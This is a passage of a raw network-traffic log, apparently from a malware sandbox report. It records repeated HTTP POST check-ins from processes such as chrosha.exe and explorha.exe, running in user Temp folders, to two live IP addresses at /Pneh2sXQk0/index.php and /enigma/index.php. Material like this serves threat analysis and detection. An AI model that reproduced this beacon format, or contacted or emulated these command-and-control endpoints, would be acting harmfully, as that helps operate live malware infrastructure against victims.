                                                                                                                                                                                                                                      Apr 19, 2024 03:31:20.628530025 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:20.870258093 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      299192.168.2.550141193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:20.973072052 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:21.221287012 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      300192.168.2.550142193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:21.125766993 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:21.378742933 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      301192.168.2.550144193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:21.476008892 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:21.727442026 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      302192.168.2.550145193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:21.745156050 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:21.990434885 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      303192.168.2.550146193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:22.084155083 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:22.328073025 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      304192.168.2.550147193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:22.243921995 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:22.496165037 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      305192.168.2.550148193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:22.582182884 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:22.839447975 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      306192.168.2.550149193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:22.855777025 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:23.103256941 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      307192.168.2.550150193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:23.199419022 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:23.448077917 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      308192.168.2.550151193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:23.361489058 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:23.613274097 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      309192.168.2.550152193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:23.704118967 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:23.960421085 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      310192.168.2.550153193.233.132.56802956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:23.978367090 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:24.226309061 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      311192.168.2.550154193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:24.322788000 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:24.569756985 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      312192.168.2.550155193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:24.479047060 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:24.727377892 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      313192.168.2.550156193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:24.819403887 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:25.066776991 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      314192.168.2.550157193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:25.079587936 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:25.318634033 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
